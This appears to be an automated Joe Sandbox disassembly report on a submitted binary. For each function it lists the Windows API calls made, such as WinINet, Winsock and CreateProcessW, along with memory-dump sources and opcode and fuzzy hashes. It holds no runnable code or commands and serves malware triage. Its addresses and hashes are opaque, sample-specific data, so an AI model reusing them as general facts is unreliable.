                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 1da052a387ff321648c453c66873a6594b91c2355afe2933afcba4dc972af79a
                                                            • Instruction ID: 0e0e3ce5bf03559a59094352ba54b1638b0c6290bacbc45f05875e0c54edff20
                                                            • Opcode Fuzzy Hash: 1da052a387ff321648c453c66873a6594b91c2355afe2933afcba4dc972af79a
                                                            • Instruction Fuzzy Hash: BF31AC31604346AFDB218F75CC44BBA7BA9FF41310F194429F8689B1E1E731E960DBA5
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00D54F02
                                                              • Part of subcall function 00D33641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D3365B
                                                              • Part of subcall function 00D33641: GetCurrentThreadId.KERNEL32 ref: 00D33662
                                                              • Part of subcall function 00D33641: AttachThreadInput.USER32(00000000,?,00D35005), ref: 00D33669
                                                            • GetCaretPos.USER32(?), ref: 00D54F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 00D54F4E
                                                            • GetForegroundWindow.USER32 ref: 00D54F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: ff101f38fddb3b5b9474f35ac8996c74da0c77167b86216500110c758847045e
                                                            • Instruction ID: bcc65d4720768822491d42efc01c8b2ef876c0df8d3032ae4139faef437e603b
                                                            • Opcode Fuzzy Hash: ff101f38fddb3b5b9474f35ac8996c74da0c77167b86216500110c758847045e
                                                            • Instruction Fuzzy Hash: 69310D75D00208AFDB00EFA9C9859EFB7F9EF98304F10406AE915E7341EA719E459BA1
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetCursorPos.USER32(?), ref: 00D5C4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0B9AB,?,?,?,?,?), ref: 00D5C4E7
                                                            • GetCursorPos.USER32(?), ref: 00D5C534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0B9AB,?,?,?), ref: 00D5C56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: f8648fb618f12e500e95eae862f6e7d5ed98488f45ea665bc89f57e5315bd766
                                                            • Instruction ID: 0ffa9f5bec3aeef7bd54b500c175d069701df8832eaabce483933a851ceab408
                                                            • Opcode Fuzzy Hash: f8648fb618f12e500e95eae862f6e7d5ed98488f45ea665bc89f57e5315bd766
                                                            • Instruction Fuzzy Hash: 9231A035610218AFCF26CF98D858EEA7BB5EB09311F48406AFD058B361D731AD54DBB4
                                                            APIs
                                                              • Part of subcall function 00D2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D28121
                                                              • Part of subcall function 00D2810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D2812B
                                                              • Part of subcall function 00D2810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D2813A
                                                              • Part of subcall function 00D2810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28141
                                                              • Part of subcall function 00D2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D286A3
                                                            • _memcmp.LIBCMT ref: 00D286C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D286FC
                                                            • HeapFree.KERNEL32(00000000), ref: 00D28703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: b66e209e3c5353abf6146edaf7e86dba2a5425637895d7c4573898d765e50557
                                                            • Instruction ID: 2ea8756fbe5ce04f0b9977cbd7e2d02607e10ef67e2ccd416f80ade3b97b0e67
                                                            • Opcode Fuzzy Hash: b66e209e3c5353abf6146edaf7e86dba2a5425637895d7c4573898d765e50557
                                                            • Instruction Fuzzy Hash: 7D21C431D02218EFDB10DF98D948BEEB7F8EF6031AF184059E845AB240DB30AE05DB60
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00CF09AE
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            • _fprintf.LIBCMT ref: 00CF09E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00D25DBB
                                                              • Part of subcall function 00CF4AAA: _flsall.LIBCMT ref: 00CF4AC3
                                                            • __setmode.LIBCMT ref: 00CF0A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 71878834fbd3a7246472e438d22fb4b7486eb5a8038b74d70b7aa304f37fa2e7
                                                            • Instruction ID: 6812b09eec2d76a533064f2a939e451546398a0855e2982791c5896e2e77e132
                                                            • Opcode Fuzzy Hash: 71878834fbd3a7246472e438d22fb4b7486eb5a8038b74d70b7aa304f37fa2e7
                                                            • Instruction Fuzzy Hash: 5B110272904208AFDB48B3B4AC46DBEB7A8DF41320F240056F30497283EE304946B7A6
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D417A3
                                                              • Part of subcall function 00D4182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D4184C
                                                              • Part of subcall function 00D4182D: InternetCloseHandle.WININET(00000000), ref: 00D418E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 5a3e6210bf2f27ea3507efd6990f9c38e91bc9fa148f1ce5daf63b41d41abf7d
                                                            • Instruction ID: ae72e02519150a337c3f251ff7ee2a24898f5b67ecd8c2c5db21b6785bb713e3
                                                            • Opcode Fuzzy Hash: 5a3e6210bf2f27ea3507efd6990f9c38e91bc9fa148f1ce5daf63b41d41abf7d
                                                            • Instruction Fuzzy Hash: E021903A200705BFEB129F60DC41FBABBA9FF48711F14402AFA95D6650DB71D851ABB0
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00D5FAC0), ref: 00D33A64
                                                            • GetLastError.KERNEL32 ref: 00D33A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D33A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D5FAC0), ref: 00D33ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: d77ef07aaca48275d0fee38a86fda2b403a424c49c9f1404f04af0116014101a
                                                            • Instruction ID: 380d8b3c3e043476c1db91fdf6513f896bb4de366bebb1267bd76890a9ee034e
                                                            • Opcode Fuzzy Hash: d77ef07aaca48275d0fee38a86fda2b403a424c49c9f1404f04af0116014101a
                                                            • Instruction Fuzzy Hash: 5C2191755083019F8700DF28C98586BB7E8EF55364F144A2AF8D9C72A1EB31DA4ACB62
                                                            APIs
                                                            • _free.LIBCMT ref: 00D05101
                                                              • Part of subcall function 00CF571C: __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CF571C: __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CF571C: RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 0a4238c5169a7231aaa4f24da03c23c498f35c1c03b83c5aa53f86371353cdbc
                                                            • Instruction ID: ce4c4a4f6ae6ac9c23ba639ef73e959748876b99050cf4bd685d6115106a07c8
                                                            • Opcode Fuzzy Hash: 0a4238c5169a7231aaa4f24da03c23c498f35c1c03b83c5aa53f86371353cdbc
                                                            • Instruction Fuzzy Hash: 6B11A372504B19AFDB612F74BC4577F37989B04361B24092AFE4D9A2D4DE30C944ABB2
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CD44CF
                                                              • Part of subcall function 00CD407C: _memset.LIBCMT ref: 00CD40FC
                                                              • Part of subcall function 00CD407C: _wcscpy.LIBCMT ref: 00CD4150
                                                              • Part of subcall function 00CD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CD4160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00CD4524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CD4533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D0D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: b0b421f939d88167e6865e2bbc57cb3b752ebd25992b3dba212845c91444ccc1
                                                            • Instruction ID: e08712b20e22514fa22e0adfe4d2d52402a386a23b5613e131fcaaf01ed4408f
                                                            • Opcode Fuzzy Hash: b0b421f939d88167e6865e2bbc57cb3b752ebd25992b3dba212845c91444ccc1
                                                            • Instruction Fuzzy Hash: 04210770504784AFE732DB649855BEBBBEC9F05305F04009FE79E9A281D3746A84DB61
                                                            APIs
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            • gethostbyname.WSOCK32(?), ref: 00D46399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D463A4
                                                            • _memmove.LIBCMT ref: 00D463D1
                                                            • inet_ntoa.WSOCK32(?), ref: 00D463DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 1c030b02bf2cf5090cd66905cf3a38ba994d30d7bdcf574615982e8502a1564a
                                                            • Instruction ID: 00e8a6504207c3920ce7114f9bac9b8ce75d1edaa9309df08c6e42d99ccebdd3
                                                            • Opcode Fuzzy Hash: 1c030b02bf2cf5090cd66905cf3a38ba994d30d7bdcf574615982e8502a1564a
                                                            • Instruction Fuzzy Hash: 8C112176500109AFCB04FFA4DD56CAE77B8EF05311B144066FA06AB261DB31DE14EB71
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D28B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c4280713bced4471982d88eb963788acff68c0ee7c825666ddd8087bb0a0ce32
                                                            • Instruction ID: 5000de2e6838feee23fcf6082f46f4178603e3b6fddcf6042594368a0e568c93
                                                            • Opcode Fuzzy Hash: c4280713bced4471982d88eb963788acff68c0ee7c825666ddd8087bb0a0ce32
                                                            • Instruction Fuzzy Hash: FC112E79901218FFDB11DF95CC85F9EBBB4FB48710F204095E900B7250DA716E11EBA4
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00CD12D8
                                                            • GetClientRect.USER32(?,?), ref: 00D0B5FB
                                                            • GetCursorPos.USER32(?), ref: 00D0B605
                                                            • ScreenToClient.USER32(?,?), ref: 00D0B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: f284210446f3fc76e693db9910bfe176a001ef3e40608dddf3cf19d2b0b957a6
                                                            • Instruction ID: f25f30ef74856d80910f6fc6f17c3e4f07d30ea13ed87b5e9915bb96739a447b
                                                            • Opcode Fuzzy Hash: f284210446f3fc76e693db9910bfe176a001ef3e40608dddf3cf19d2b0b957a6
                                                            • Instruction Fuzzy Hash: 02112235A00219BBCB00EFA9D8899AE7BB9EB05302F540466FE01E7240D731AA519BB5
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D3115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D31184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D3118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D311C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: c183fe0054e84582db233857a158a1d54671a3383fcfe2897586f296ce25c19f
                                                            • Instruction ID: 363ea2121458845756fc9af7308367ab0a74b58ea87ec49d5bb911e558a1d916
                                                            • Opcode Fuzzy Hash: c183fe0054e84582db233857a158a1d54671a3383fcfe2897586f296ce25c19f
                                                            • Instruction Fuzzy Hash: 6A113C35D01B1ED7CF00AFA5D848AEEBBB8FF19711F044055EA85B6240CB709550CBB5
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D2D84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D2D864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D2D879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D2D897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: efae728b38c0a623a8af37b2fac4f5d5fb05ad265db82d52bccb0b047530a92f
                                                            • Instruction ID: 210f08aec08d36f0d78e1665c0eb3da91e06f7a56cdd897f2cf9d63441966d30
                                                            • Opcode Fuzzy Hash: efae728b38c0a623a8af37b2fac4f5d5fb05ad265db82d52bccb0b047530a92f
                                                            • Instruction Fuzzy Hash: 3D116175605324DBE3208F50EC08F93FBBDEB00B05F10856AAA96DA150D7B0E549DBB1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 0e1a78a9983118223da0195551f04bf1ebb0840ee48186d830b6ac90a61286e0
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: D1017B3284814EBBCF225E84CC01DEE3F76BB18391F488515FA5C580B0C236E9B1ABA1
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00D5B2E4
                                                            • ScreenToClient.USER32(?,?), ref: 00D5B2FC
                                                            • ScreenToClient.USER32(?,?), ref: 00D5B320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5B33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 40198b45221893ebf98a17d10506ec898de4906f2ff73db6d5951d9d75615328
                                                            • Instruction ID: ab024dfb358dd622ce53a43fec0032b38ff2235fe6a4829fde7630d74b26a36e
                                                            • Opcode Fuzzy Hash: 40198b45221893ebf98a17d10506ec898de4906f2ff73db6d5951d9d75615328
                                                            • Instruction Fuzzy Hash: 2C1143B9D00209EFDB41CFA9C8849EEBBB9FB08311F108166E914E3220D735AA558F60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5B644
                                                            • _memset.LIBCMT ref: 00D5B653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D96F20,00D96F64), ref: 00D5B682
                                                            • CloseHandle.KERNEL32 ref: 00D5B694
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: 52e9e2c6f09d18f0dea197b4e9c25df96f59507de81f960369e43682ba8dcf8f
                                                            • Instruction ID: 1425bdcf6472b42d1814e87b6b493fa8080dc0b994812696371cafc29183f835
                                                            • Opcode Fuzzy Hash: 52e9e2c6f09d18f0dea197b4e9c25df96f59507de81f960369e43682ba8dcf8f
                                                            • Instruction Fuzzy Hash: B6F0DAB25403047AF7102F65BC06FBB7A9CEF09795F004022FB08E92A2D775981097B9
